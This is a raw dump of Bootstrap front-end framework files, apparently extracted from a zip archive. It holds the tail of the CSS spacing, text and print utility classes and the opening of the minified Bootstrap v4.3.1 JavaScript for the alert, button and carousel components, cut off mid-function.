    margin: 1.5rem !important;
  }
  .mt-sm-4,
  .my-sm-4 {
    margin-top: 1.5rem !important;
  }
  .mr-sm-4,
  .mx-sm-4 {
    margin-right: 1.5rem !important;
  }
  .mb-sm-4,
  .my-sm-4 {
    margin-bottom: 1.5rem !important;
  }
  .ml-sm-4,
  .mx-sm-4 {
    margin-left: 1.5rem !important;
  }
  .m-sm-5 {
    margin: 3rem !important;
  }
  .mt-sm-5,
  .my-sm-5 {
    margin-top: 3rem !important;
  }
  .mr-sm-5,
  .mx-sm-5 {
    margin-right: 3rem !important;
  }
  .mb-sm-5,
  .my-sm-5 {
    margin-bottom: 3rem !important;
  }
  .ml-sm-5,
  .mx-sm-5 {
    margin-left: 3rem !important;
  }
  .p-sm-0 {
    padding: 0 !important;
  }
  .pt-sm-0,
  .py-sm-0 {
    padding-top: 0 !important;
  }
  .pr-sm-0,
  .px-sm-0 {
    padding-right: 0 !important;
  }
  .pb-sm-0,
  .py-sm-0 {
    padding-bottom: 0 !important;
  }
  .pl-sm-0,
  .px-sm-0 {
    padding-left: 0 !important;
  }
  .p-sm-1 {
    padding: 0.25rem !important;
  }
  .pt-sm-1,
  .py-sm-1 {
    padding-top: 0.25rem !important;
  }
  .pr-sm-1,
  .px-sm-1 {
    padding-right: 0.25rem !important;
  }
  .pb-sm-1,
  .py-sm-1 {
    padding-bottom: 0.25rem !important;
  }
  .pl-sm-1,
  .px-sm-1 {
    padding-left: 0.25rem !important;
  }
  .p-sm-2 {
    padding: 0.5rem !important;
  }
  .pt-sm-2,
  .py-sm-2 {
    padding-top: 0.5rem !important;
  }
  .pr-sm-2,
  .px-sm-2 {
    padding-right: 0.5rem !important;
  }
  .pb-sm-2,
  .py-sm-2 {
    padding-bottom: 0.5rem !important;
  }
  .pl-sm-2,
  .px-sm-2 {
    padding-left: 0.5rem !important;
  }
  .p-sm-3 {
    padding: 1rem !important;
  }
  .pt-sm-3,
  .py-sm-3 {
    padding-top: 1rem !important;
  }
  .pr-sm-3,
  .px-sm-3 {
    padding-right: 1rem !important;
  }
  .pb-sm-3,
  .py-sm-3 {
    padding-bottom: 1rem !important;
  }
  .pl-sm-3,
  .px-sm-3 {
    padding-left: 1rem !important;
  }
  .p-sm-4 {
    padding: 1.5rem !important;
  }
  .pt-sm-4,
  .py-sm-4 {
    padding-top: 1.5rem !important;
  }
  .pr-sm-4,
  .px-sm-4 {
    padding-right: 1.5rem !important;
  }
  .pb-sm-4,
  .py-sm-4 {
    padding-bottom: 1.5rem !important;
  }
  .pl-sm-4,
  .px-sm-4 {
    padding-left: 1.5rem !important;
  }
  .p-sm-5 {
    padding: 3rem !important;
  }
  .pt-sm-5,
  .py-sm-5 {
    padding-top: 3rem !important;
  }
  .pr-sm-5,
  .px-sm-5 {
    padding-right: 3rem !important;
  }
  .pb-sm-5,
  .py-sm-5 {
    padding-bottom: 3rem !important;
  }
  .pl-sm-5,
  .px-sm-5 {
    padding-left: 3rem !important;
  }
  .m-sm-auto {
    margin: auto !important;
  }
  .mt-sm-auto,
  .my-sm-auto {
    margin-top: auto !important;
  }
  .mr-sm-auto,
  .mx-sm-auto {
    margin-right: auto !important;
  }
  .mb-sm-auto,
  .my-sm-auto {
    margin-bottom: auto !important;
  }
  .ml-sm-auto,
  .mx-sm-auto {
    margin-left: auto !important;
  }
}

@media (min-width: 768px) {
  .m-md-0 {
    margin: 0 !important;
  }
  .mt-md-0,
  .my-md-0 {
    margin-top: 0 !important;
  }
  .mr-md-0,
  .mx-md-0 {
    margin-right: 0 !important;
  }
  .mb-md-0,
  .my-md-0 {
    margin-bottom: 0 !important;
  }
  .ml-md-0,
  .mx-md-0 {
    margin-left: 0 !important;
  }
  .m-md-1 {
    margin: 0.25rem !important;
  }
  .mt-md-1,
  .my-md-1 {
    margin-top: 0.25rem !important;
  }
  .mr-md-1,
  .mx-md-1 {
    margin-right: 0.25rem !important;
  }
  .mb-md-1,
  .my-md-1 {
    margin-bottom: 0.25rem !important;
  }
  .ml-md-1,
  .mx-md-1 {
    margin-left: 0.25rem !important;
  }
  .m-md-2 {
    margin: 0.5rem !important;
  }
  .mt-md-2,
  .my-md-2 {
    margin-top: 0.5rem !important;
  }
  .mr-md-2,
  .mx-md-2 {
    margin-right: 0.5rem !important;
  }
  .mb-md-2,
  .my-md-2 {
    margin-bottom: 0.5rem !important;
  }
  .ml-md-2,
  .mx-md-2 {
    margin-left: 0.5rem !important;
  }
  .m-md-3 {
    margin: 1rem !important;
  }
  .mt-md-3,
  .my-md-3 {
    margin-top: 1rem !important;
  }
  .mr-md-3,
  .mx-md-3 {
    margin-right: 1rem !important;
  }
  .mb-md-3,
  .my-md-3 {
    margin-bottom: 1rem !important;
  }
  .ml-md-3,
  .mx-md-3 {
    margin-left: 1rem !important;
  }
  .m-md-4 {
    margin: 1.5rem !important;
  }
  .mt-md-4,
  .my-md-4 {
    margin-top: 1.5rem !important;
  }
  .mr-md-4,
  .mx-md-4 {
    margin-right: 1.5rem !important;
  }
  .mb-md-4,
  .my-md-4 {
    margin-bottom: 1.5rem !important;
  }
  .ml-md-4,
  .mx-md-4 {
    margin-left: 1.5rem !important;
  }
  .m-md-5 {
    margin: 3rem !important;
  }
  .mt-md-5,
  .my-md-5 {
    margin-top: 3rem !important;
  }
  .mr-md-5,
  .mx-md-5 {
    margin-right: 3rem !important;
  }
  .mb-md-5,
  .my-md-5 {
    margin-bottom: 3rem !important;
  }
  .ml-md-5,
  .mx-md-5 {
    margin-left: 3rem !important;
  }
  .p-md-0 {
    padding: 0 !important;
  }
  .pt-md-0,
  .py-md-0 {
    padding-top: 0 !important;
  }
  .pr-md-0,
  .px-md-0 {
    padding-right: 0 !important;
  }
  .pb-md-0,
  .py-md-0 {
    padding-bottom: 0 !important;
  }
  .pl-md-0,
  .px-md-0 {
    padding-left: 0 !important;
  }
  .p-md-1 {
    padding: 0.25rem !important;
  }
  .pt-md-1,
  .py-md-1 {
    padding-top: 0.25rem !important;
  }
  .pr-md-1,
  .px-md-1 {
    padding-right: 0.25rem !important;
  }
  .pb-md-1,
  .py-md-1 {
    padding-bottom: 0.25rem !important;
  }
  .pl-md-1,
  .px-md-1 {
    padding-left: 0.25rem !important;
  }
  .p-md-2 {
    padding: 0.5rem !important;
  }
  .pt-md-2,
  .py-md-2 {
    padding-top: 0.5rem !important;
  }
  .pr-md-2,
  .px-md-2 {
    padding-right: 0.5rem !important;
  }
  .pb-md-2,
  .py-md-2 {
    padding-bottom: 0.5rem !important;
  }
  .pl-md-2,
  .px-md-2 {
    padding-left: 0.5rem !important;
  }
  .p-md-3 {
    padding: 1rem !important;
  }
  .pt-md-3,
  .py-md-3 {
    padding-top: 1rem !important;
  }
  .pr-md-3,
  .px-md-3 {
    padding-right: 1rem !important;
  }
  .pb-md-3,
  .py-md-3 {
    padding-bottom: 1rem !important;
  }
  .pl-md-3,
  .px-md-3 {
    padding-left: 1rem !important;
  }
  .p-md-4 {
    padding: 1.5rem !important;
  }
  .pt-md-4,
  .py-md-4 {
    padding-top: 1.5rem !important;
  }
  .pr-md-4,
  .px-md-4 {
    padding-right: 1.5rem !important;
  }
  .pb-md-4,
  .py-md-4 {
    padding-bottom: 1.5rem !important;
  }
  .pl-md-4,
  .px-md-4 {
    padding-left: 1.5rem !important;
  }
  .p-md-5 {
    padding: 3rem !important;
  }
  .pt-md-5,
  .py-md-5 {
    padding-top: 3rem !important;
  }
  .pr-md-5,
  .px-md-5 {
    padding-right: 3rem !important;
  }
  .pb-md-5,
  .py-md-5 {
    padding-bottom: 3rem !important;
  }
  .pl-md-5,
  .px-md-5 {
    padding-left: 3rem !important;
  }
  .m-md-auto {
    margin: auto !important;
  }
  .mt-md-auto,
  .my-md-auto {
    margin-top: auto !important;
  }
  .mr-md-auto,
  .mx-md-auto {
    margin-right: auto !important;
  }
  .mb-md-auto,
  .my-md-auto {
    margin-bottom: auto !important;
  }
  .ml-md-auto,
  .mx-md-auto {
    margin-left: auto !important;
  }
}

@media (min-width: 992px) {
  .m-lg-0 {
    margin: 0 !important;
  }
  .mt-lg-0,
  .my-lg-0 {
    margin-top: 0 !important;
  }
  .mr-lg-0,
  .mx-lg-0 {
    margin-right: 0 !important;
  }
  .mb-lg-0,
  .my-lg-0 {
    margin-bottom: 0 !important;
  }
  .ml-lg-0,
  .mx-lg-0 {
    margin-left: 0 !important;
  }
  .m-lg-1 {
    margin: 0.25rem !important;
  }
  .mt-lg-1,
  .my-lg-1 {
    margin-top: 0.25rem !important;
  }
  .mr-lg-1,
  .mx-lg-1 {
    margin-right: 0.25rem !important;
  }
  .mb-lg-1,
  .my-lg-1 {
    margin-bottom: 0.25rem !important;
  }
  .ml-lg-1,
  .mx-lg-1 {
    margin-left: 0.25rem !important;
  }
  .m-lg-2 {
    margin: 0.5rem !important;
  }
  .mt-lg-2,
  .my-lg-2 {
    margin-top: 0.5rem !important;
  }
  .mr-lg-2,
  .mx-lg-2 {
    margin-right: 0.5rem !important;
  }
  .mb-lg-2,
  .my-lg-2 {
    margin-bottom: 0.5rem !important;
  }
  .ml-lg-2,
  .mx-lg-2 {
    margin-left: 0.5rem !important;
  }
  .m-lg-3 {
    margin: 1rem !important;
  }
  .mt-lg-3,
  .my-lg-3 {
    margin-top: 1rem !important;
  }
  .mr-lg-3,
  .mx-lg-3 {
    margin-right: 1rem !important;
  }
  .mb-lg-3,
  .my-lg-3 {
    margin-bottom: 1rem !important;
  }
  .ml-lg-3,
  .mx-lg-3 {
    margin-left: 1rem !important;
  }
  .m-lg-4 {
    margin: 1.5rem !important;
  }
  .mt-lg-4,
  .my-lg-4 {
    margin-top: 1.5rem !important;
  }
  .mr-lg-4,
  .mx-lg-4 {
    margin-right: 1.5rem !important;
  }
  .mb-lg-4,
  .my-lg-4 {
    margin-bottom: 1.5rem !important;
  }
  .ml-lg-4,
  .mx-lg-4 {
    margin-left: 1.5rem !important;
  }
  .m-lg-5 {
    margin: 3rem !important;
  }
  .mt-lg-5,
  .my-lg-5 {
    margin-top: 3rem !important;
  }
  .mr-lg-5,
  .mx-lg-5 {
    margin-right: 3rem !important;
  }
  .mb-lg-5,
  .my-lg-5 {
    margin-bottom: 3rem !important;
  }
  .ml-lg-5,
  .mx-lg-5 {
    margin-left: 3rem !important;
  }
  .p-lg-0 {
    padding: 0 !important;
  }
  .pt-lg-0,
  .py-lg-0 {
    padding-top: 0 !important;
  }
  .pr-lg-0,
  .px-lg-0 {
    padding-right: 0 !important;
  }
  .pb-lg-0,
  .py-lg-0 {
    padding-bottom: 0 !important;
  }
  .pl-lg-0,
  .px-lg-0 {
    padding-left: 0 !important;
  }
  .p-lg-1 {
    padding: 0.25rem !important;
  }
  .pt-lg-1,
  .py-lg-1 {
    padding-top: 0.25rem !important;
  }
  .pr-lg-1,
  .px-lg-1 {
    padding-right: 0.25rem !important;
  }
  .pb-lg-1,
  .py-lg-1 {
    padding-bottom: 0.25rem !important;
  }
  .pl-lg-1,
  .px-lg-1 {
    padding-left: 0.25rem !important;
  }
  .p-lg-2 {
    padding: 0.5rem !important;
  }
  .pt-lg-2,
  .py-lg-2 {
    padding-top: 0.5rem !important;
  }
  .pr-lg-2,
  .px-lg-2 {
    padding-right: 0.5rem !important;
  }
  .pb-lg-2,
  .py-lg-2 {
    padding-bottom: 0.5rem !important;
  }
  .pl-lg-2,
  .px-lg-2 {
    padding-left: 0.5rem !important;
  }
  .p-lg-3 {
    padding: 1rem !important;
  }
  .pt-lg-3,
  .py-lg-3 {
    padding-top: 1rem !important;
  }
  .pr-lg-3,
  .px-lg-3 {
    padding-right: 1rem !important;
  }
  .pb-lg-3,
  .py-lg-3 {
    padding-bottom: 1rem !important;
  }
  .pl-lg-3,
  .px-lg-3 {
    padding-left: 1rem !important;
  }
  .p-lg-4 {
    padding: 1.5rem !important;
  }
  .pt-lg-4,
  .py-lg-4 {
    padding-top: 1.5rem !important;
  }
  .pr-lg-4,
  .px-lg-4 {
    padding-right: 1.5rem !important;
  }
  .pb-lg-4,
  .py-lg-4 {
    padding-bottom: 1.5rem !important;
  }
  .pl-lg-4,
  .px-lg-4 {
    padding-left: 1.5rem !important;
  }
  .p-lg-5 {
    padding: 3rem !important;
  }
  .pt-lg-5,
  .py-lg-5 {
    padding-top: 3rem !important;
  }
  .pr-lg-5,
  .px-lg-5 {
    padding-right: 3rem !important;
  }
  .pb-lg-5,
  .py-lg-5 {
    padding-bottom: 3rem !important;
  }
  .pl-lg-5,
  .px-lg-5 {
    padding-left: 3rem !important;
  }
  .m-lg-auto {
    margin: auto !important;
  }
  .mt-lg-auto,
  .my-lg-auto {
    margin-top: auto !important;
  }
  .mr-lg-auto,
  .mx-lg-auto {
    margin-right: auto !important;
  }
  .mb-lg-auto,
  .my-lg-auto {
    margin-bottom: auto !important;
  }
  .ml-lg-auto,
  .mx-lg-auto {
    margin-left: auto !important;
  }
}

@media (min-width: 1200px) {
  .m-xl-0 {
    margin: 0 !important;
  }
  .mt-xl-0,
  .my-xl-0 {
    margin-top: 0 !important;
  }
  .mr-xl-0,
  .mx-xl-0 {
    margin-right: 0 !important;
  }
  .mb-xl-0,
  .my-xl-0 {
    margin-bottom: 0 !important;
  }
  .ml-xl-0,
  .mx-xl-0 {
    margin-left: 0 !important;
  }
  .m-xl-1 {
    margin: 0.25rem !important;
  }
  .mt-xl-1,
  .my-xl-1 {
    margin-top: 0.25rem !important;
  }
  .mr-xl-1,
  .mx-xl-1 {
    margin-right: 0.25rem !important;
  }
  .mb-xl-1,
  .my-xl-1 {
    margin-bottom: 0.25rem !important;
  }
  .ml-xl-1,
  .mx-xl-1 {
    margin-left: 0.25rem !important;
  }
  .m-xl-2 {
    margin: 0.5rem !important;
  }
  .mt-xl-2,
  .my-xl-2 {
    margin-top: 0.5rem !important;
  }
  .mr-xl-2,
  .mx-xl-2 {
    margin-right: 0.5rem !important;
  }
  .mb-xl-2,
  .my-xl-2 {
    margin-bottom: 0.5rem !important;
  }
  .ml-xl-2,
  .mx-xl-2 {
    margin-left: 0.5rem !important;
  }
  .m-xl-3 {
    margin: 1rem !important;
  }
  .mt-xl-3,
  .my-xl-3 {
    margin-top: 1rem !important;
  }
  .mr-xl-3,
  .mx-xl-3 {
    margin-right: 1rem !important;
  }
  .mb-xl-3,
  .my-xl-3 {
    margin-bottom: 1rem !important;
  }
  .ml-xl-3,
  .mx-xl-3 {
    margin-left: 1rem !important;
  }
  .m-xl-4 {
    margin: 1.5rem !important;
  }
  .mt-xl-4,
  .my-xl-4 {
    margin-top: 1.5rem !important;
  }
  .mr-xl-4,
  .mx-xl-4 {
    margin-right: 1.5rem !important;
  }
  .mb-xl-4,
  .my-xl-4 {
    margin-bottom: 1.5rem !important;
  }
  .ml-xl-4,
  .mx-xl-4 {
    margin-left: 1.5rem !important;
  }
  .m-xl-5 {
    margin: 3rem !important;
  }
  .mt-xl-5,
  .my-xl-5 {
    margin-top: 3rem !important;
  }
  .mr-xl-5,
  .mx-xl-5 {
    margin-right: 3rem !important;
  }
  .mb-xl-5,
  .my-xl-5 {
    margin-bottom: 3rem !important;
  }
  .ml-xl-5,
  .mx-xl-5 {
    margin-left: 3rem !important;
  }
  .p-xl-0 {
    padding: 0 !important;
  }
  .pt-xl-0,
  .py-xl-0 {
    padding-top: 0 !important;
  }
  .pr-xl-0,
  .px-xl-0 {
    padding-right: 0 !important;
  }
  .pb-xl-0,
  .py-xl-0 {
    padding-bottom: 0 !important;
  }
  .pl-xl-0,
  .px-xl-0 {
    padding-left: 0 !important;
  }
  .p-xl-1 {
    padding: 0.25rem !important;
  }
  .pt-xl-1,
  .py-xl-1 {
    padding-top: 0.25rem !important;
  }
  .pr-xl-1,
  .px-xl-1 {
    padding-right: 0.25rem !important;
  }
  .pb-xl-1,
  .py-xl-1 {
    padding-bottom: 0.25rem !important;
  }
  .pl-xl-1,
  .px-xl-1 {
    padding-left: 0.25rem !important;
  }
  .p-xl-2 {
    padding: 0.5rem !important;
  }
  .pt-xl-2,
  .py-xl-2 {
    padding-top: 0.5rem !important;
  }
  .pr-xl-2,
  .px-xl-2 {
    padding-right: 0.5rem !important;
  }
  .pb-xl-2,
  .py-xl-2 {
    padding-bottom: 0.5rem !important;
  }
  .pl-xl-2,
  .px-xl-2 {
    padding-left: 0.5rem !important;
  }
  .p-xl-3 {
    padding: 1rem !important;
  }
  .pt-xl-3,
  .py-xl-3 {
    padding-top: 1rem !important;
  }
  .pr-xl-3,
  .px-xl-3 {
    padding-right: 1rem !important;
  }
  .pb-xl-3,
  .py-xl-3 {
    padding-bottom: 1rem !important;
  }
  .pl-xl-3,
  .px-xl-3 {
    padding-left: 1rem !important;
  }
  .p-xl-4 {
    padding: 1.5rem !important;
  }
  .pt-xl-4,
  .py-xl-4 {
    padding-top: 1.5rem !important;
  }
  .pr-xl-4,
  .px-xl-4 {
    padding-right: 1.5rem !important;
  }
  .pb-xl-4,
  .py-xl-4 {
    padding-bottom: 1.5rem !important;
  }
  .pl-xl-4,
  .px-xl-4 {
    padding-left: 1.5rem !important;
  }
  .p-xl-5 {
    padding: 3rem !important;
  }
  .pt-xl-5,
  .py-xl-5 {
    padding-top: 3rem !important;
  }
  .pr-xl-5,
  .px-xl-5 {
    padding-right: 3rem !important;
  }
  .pb-xl-5,
  .py-xl-5 {
    padding-bottom: 3rem !important;
  }
  .pl-xl-5,
  .px-xl-5 {
    padding-left: 3rem !important;
  }
  .m-xl-auto {
    margin: auto !important;
  }
  .mt-xl-auto,
  .my-xl-auto {
    margin-top: auto !important;
  }
  .mr-xl-auto,
  .mx-xl-auto {
    margin-right: auto !important;
  }
  .mb-xl-auto,
  .my-xl-auto {
    margin-bottom: auto !important;
  }
  .ml-xl-auto,
  .mx-xl-auto {
    margin-left: auto !important;
  }
}

.text-justify {
  text-align: justify !important;
}

.text-nowrap {
  white-space: nowrap !important;
}

.text-truncate {
  overflow: hidden;
  text-overflow: ellipsis;
  white-space: nowrap;
}

.text-left {
  text-align: left !important;
}

.text-right {
  text-align: right !important;
}

.text-center {
  text-align: center !important;
}

@media (min-width: 576px) {
  .text-sm-left {
    text-align: left !important;
  }
  .text-sm-right {
    text-align: right !important;
  }
  .text-sm-center {
    text-align: center !important;
  }
}

@media (min-width: 768px) {
  .text-md-left {
    text-align: left !important;
  }
  .text-md-right {
    text-align: right !important;
  }
  .text-md-center {
    text-align: center !important;
  }
}

@media (min-width: 992px) {
  .text-lg-left {
    text-align: left !important;
  }
  .text-lg-right {
    text-align: right !important;
  }
  .text-lg-center {
    text-align: center !important;
  }
}

@media (min-width: 1200px) {
  .text-xl-left {
    text-align: left !important;
  }
  .text-xl-right {
    text-align: right !important;
  }
  .text-xl-center {
    text-align: center !important;
  }
}

.text-lowercase {
  text-transform: lowercase !important;
}

.text-uppercase {
  text-transform: uppercase !important;
}

.text-capitalize {
  text-transform: capitalize !important;
}

.font-weight-light {
  font-weight: 300 !important;
}

.font-weight-normal {
  font-weight: 400 !important;
}

.font-weight-bold {
  font-weight: 700 !important;
}

.font-italic {
  font-style: italic !important;
}

.text-white {
  color: #fff !important;
}

.text-primary {
  color: #007bff !important;
}

a.text-primary:hover, a.text-primary:focus {
  color: #0062cc !important;
}

.text-secondary {
  color: #6c757d !important;
}

a.text-secondary:hover, a.text-secondary:focus {
  color: #545b62 !important;
}

.text-success {
  color: #28a745 !important;
}

a.text-success:hover, a.text-success:focus {
  color: #1e7e34 !important;
}

.text-info {
  color: #17a2b8 !important;
}

a.text-info:hover, a.text-info:focus {
  color: #117a8b !important;
}

.text-warning {
  color: #ffc107 !important;
}

a.text-warning:hover, a.text-warning:focus {
  color: #d39e00 !important;
}

.text-danger {
  color: #dc3545 !important;
}

a.text-danger:hover, a.text-danger:focus {
  color: #bd2130 !important;
}

.text-light {
  color: #f8f9fa !important;
}

a.text-light:hover, a.text-light:focus {
  color: #dae0e5 !important;
}

.text-dark {
  color: #343a40 !important;
}

a.text-dark:hover, a.text-dark:focus {
  color: #1d2124 !important;
}

.text-muted {
  color: #6c757d !important;
}

.text-hide {
  font: 0/0 a;
  color: transparent;
  text-shadow: none;
  background-color: transparent;
  border: 0;
}

.visible {
  visibility: visible !important;
}

.invisible {
  visibility: hidden !important;
}

@media print {
  *,
  *::before,
  *::after {
    text-shadow: none !important;
    box-shadow: none !important;
  }
  a:not(.btn) {
    text-decoration: underline;
  }
  abbr[title]::after {
    content: " (" attr(title) ")";
  }
  pre {
    white-space: pre-wrap !important;
  }
  pre,
  blockquote {
    border: 1px solid #999;
    page-break-inside: avoid;
  }
  thead {
    display: table-header-group;
  }
  tr,
  img {
    page-break-inside: avoid;
  }
  p,
  h2,
  h3 {
    orphans: 3;
    widows: 3;
  }
  h2,
  h3 {
    page-break-after: avoid;
  }
  @page {
    size: a3;
  }
  body {
    min-width: 992px !important;
  }
  .container {
    min-width: 992px !important;
  }
  .navbar {
    display: none;
  }
  .badge {
    border: 1px solid #000;
  }
  .table {
    border-collapse: collapse !important;
  }
  .table td,
  .table th {
    background-color: #fff !important;
  }
  .table-bordered th,
  .table-bordered td {
    border: 1px solid #ddd !important;
  }
}
/*# sourceMappingURL=bootstrap.css.map */PK!'�^�����bootstrap/js/bootstrap.min.jsnu&1i�/*!
  * Bootstrap v4.3.1 (https://getbootstrap.com/)
  * Copyright 2011-2019 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors)
  * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
  */
!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e((t=t||self).bootstrap={},t.jQuery,t.Popper)}(this,function(t,g,u){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(o){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{},e=Object.keys(r);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(r).filter(function(t){return Object.getOwnPropertyDescriptor(r,t).enumerable}))),e.forEach(function(t){var e,n,i;e=o,i=r[n=t],n in e?Object.defineProperty(e,n,{value:i,enumerable:!0,configurable:!0,writable:!0}):e[n]=i})}return o}g=g&&g.hasOwnProperty("default")?g.default:g,u=u&&u.hasOwnProperty("default")?u.default:u;var e="transitionend";function n(t){var e=this,n=!1;return g(this).one(_.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||_.triggerTransitionEnd(e)},t),this}var _={TRANSITION_END:"bsTransitionEnd",getUID:function(t){for(;t+=~~(1e6*Math.random()),document.getElementById(t););return t},getSelectorFromElement:function(t){var e=t.getAttribute("data-target");if(!e||"#"===e){var n=t.getAttribute("href");e=n&&"#"!==n?n.trim():""}try{return document.querySelector(e)?e:null}catch(t){return null}},getTransitionDurationFromElement:function(t){if(!t)return 0;var e=g(t).css("transition-duration"),n=g(t).css("transition-delay"),i=parseFloat(e),o=parseFloat(n);return i||o?(e=e.split(",")[0],n=n.split(",")[0],1e3*(parseFloat(e)+parseFloat(n))):0},reflow:function(t){return t.offsetHeight},triggerTransitionEnd:function(t){g(t).trigger(e)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var i in n)if(Object.prototype.hasOwnProperty.call(n,i)){var o=n[i],r=e[i],s=r&&_.isElement(r)?"element":(a=r,{}.toString.call(a).match(/\s([a-z]+)/i)[1].toLowerCase());if(!new RegExp(o).test(s))throw new Error(t.toUpperCase()+': Option "'+i+'" provided type "'+s+'" but expected type "'+o+'".')}var a},findShadowRoot:function(t){if(!document.documentElement.attachShadow)return null;if("function"!=typeof t.getRootNode)return t instanceof ShadowRoot?t:t.parentNode?_.findShadowRoot(t.parentNode):null;var e=t.getRootNode();return e instanceof ShadowRoot?e:null}};g.fn.emulateTransitionEnd=n,g.event.special[_.TRANSITION_END]={bindType:e,delegateType:e,handle:function(t){if(g(t.target).is(this))return t.handleObj.handler.apply(this,arguments)}};var o="alert",r="bs.alert",a="."+r,c=g.fn[o],h={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},f="alert",d="fade",m="show",p=function(){function i(t){this._element=t}var t=i.prototype;return t.close=function(t){var e=this._element;t&&(e=this._getRootElement(t)),this._triggerCloseEvent(e).isDefaultPrevented()||this._removeElement(e)},t.dispose=function(){g.removeData(this._element,r),this._element=null},t._getRootElement=function(t){var e=_.getSelectorFromElement(t),n=!1;return e&&(n=document.querySelector(e)),n||(n=g(t).closest("."+f)[0]),n},t._triggerCloseEvent=function(t){var e=g.Event(h.CLOSE);return g(t).trigger(e),e},t._removeElement=function(e){var n=this;if(g(e).removeClass(m),g(e).hasClass(d)){var t=_.getTransitionDurationFromElement(e);g(e).one(_.TRANSITION_END,function(t){return n._destroyElement(e,t)}).emulateTransitionEnd(t)}else this._destroyElement(e)},t._destroyElement=function(t){g(t).detach().trigger(h.CLOSED).remove()},i._jQueryInterface=function(n){return this.each(function(){var t=g(this),e=t.data(r);e||(e=new i(this),t.data(r,e)),"close"===n&&e[n](this)})},i._handleDismiss=function(e){return function(t){t&&t.preventDefault(),e.close(this)}},s(i,null,[{key:"VERSION",get:function(){return"4.3.1"}}]),i}();g(document).on(h.CLICK_DATA_API,'[data-dismiss="alert"]',p._handleDismiss(new p)),g.fn[o]=p._jQueryInterface,g.fn[o].Constructor=p,g.fn[o].noConflict=function(){return g.fn[o]=c,p._jQueryInterface};var v="button",y="bs.button",E="."+y,C=".data-api",T=g.fn[v],S="active",b="btn",I="focus",D='[data-toggle^="button"]',w='[data-toggle="buttons"]',A='input:not([type="hidden"])',N=".active",O=".btn",k={CLICK_DATA_API:"click"+E+C,FOCUS_BLUR_DATA_API:"focus"+E+C+" blur"+E+C},P=function(){function n(t){this._element=t}var t=n.prototype;return t.toggle=function(){var t=!0,e=!0,n=g(this._element).closest(w)[0];if(n){var i=this._element.querySelector(A);if(i){if("radio"===i.type)if(i.checked&&this._element.classList.contains(S))t=!1;else{var o=n.querySelector(N);o&&g(o).removeClass(S)}if(t){if(i.hasAttribute("disabled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!this._element.classList.contains(S),g(i).trigger("change")}i.focus(),e=!1}}e&&this._element.setAttribute("aria-pressed",!this._element.classList.contains(S)),t&&g(this._element).toggleClass(S)},t.dispose=function(){g.removeData(this._element,y),this._element=null},n._jQueryInterface=function(e){return this.each(function(){var t=g(this).data(y);t||(t=new n(this),g(this).data(y,t)),"toggle"===e&&t[e]()})},s(n,null,[{key:"VERSION",get:function(){return"4.3.1"}}]),n}();g(document).on(k.CLICK_DATA_API,D,function(t){t.preventDefault();var e=t.target;g(e).hasClass(b)||(e=g(e).closest(O)),P._jQueryInterface.call(g(e),"toggle")}).on(k.FOCUS_BLUR_DATA_API,D,function(t){var e=g(t.target).closest(O)[0];g(e).toggleClass(I,/^focus(in)?$/.test(t.type))}),g.fn[v]=P._jQueryInterface,g.fn[v].Constructor=P,g.fn[v].noConflict=function(){return g.fn[v]=T,P._jQueryInterface};var L="carousel",j="bs.carousel",H="."+j,R=".data-api",x=g.fn[L],F={interval:5e3,keyboard:!0,slide:!1,pause:"hover",wrap:!0,touch:!0},U={interval:"(number|boolean)",keyboard:"boolean",slide:"(boolean|string)",pause:"(string|boolean)",wrap:"boolean",touch:"boolean"},W="next",q="prev",M="left",K="right",Q={SLIDE:"slide"+H,SLID:"slid"+H,KEYDOWN:"keydown"+H,MOUSEENTER:"mouseenter"+H,MOUSELEAVE:"mouseleave"+H,TOUCHSTART:"touchstart"+H,TOUCHMOVE:"touchmove"+H,TOUCHEND:"touchend"+H,POINTERDOWN:"pointerdown"+H,POINTERUP:"pointerup"+H,DRAG_START:"dragstart"+H,LOAD_DATA_API:"load"+H+R,CLICK_DATA_API:"click"+H+R},B="carousel",V="active",Y="slide",z="carousel-item-right",X="carousel-item-left",$="carousel-item-next",G="carousel-item-prev",J="pointer-event",Z=".active",tt=".active.carousel-item",et=".carousel-item",nt=".carousel-item img",it=".carousel-item-next, .carousel-item-prev",ot=".carousel-indicators",rt="[data-slide], [data-slide-to]",st='[data-ride="carousel"]',at={TOUCH:"touch",PEN:"pen"},lt=function(){function r(t,e){this._items=null,this._interval=null,this._activeElement=null,this._isPaused=!1,this._isSliding=!1,this.touchTimeout=null,this.touchStartX=0,this.touchDeltaX=0,this._config=this._getConfig(e),this._element=t,this._indicatorsElement=this._element.querySelector(ot),this._touchSupported="ontouchstart"in document.documentElement||0<navigator.maxTouchPoints,this._pointerEvent=Boolean(window.PointerEvent||window.MSPointerEvent),this._addEventListeners()}var t=r.prototype;return t.next=function(){this._isSliding||this._slide(W)},t.nextWhenVisible=function(){!document.hidden&&g(this._element).is(":visible")&&"hidden"!==g(this._element).css("visibility")&&this.next()},t.prev=function(){this._isSliding||this._slide(q)},t.pause=function(t){t||(this._isPaused=!0),this._element.querySelector(it)&&(_.triggerTransitionEnd(this._element),this.cycle(!0)),clearInterval(this._interval),this._interval=null},t.cycle=function(t){t||(this._isPaused=!1),this._interval&&(clearInterval(this._interval),this._interval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},t.to=function(t){var e=this;this._activeElement=this._element.querySelector(tt);var n=this._getItemIndex(this._activeElement);if(!(t>this._items.length-1||t<0))if(this._isSliding)g(this._element).one(Q.SLID,function(){return e.to(t)});else{if(n===t)return this.pause(),void 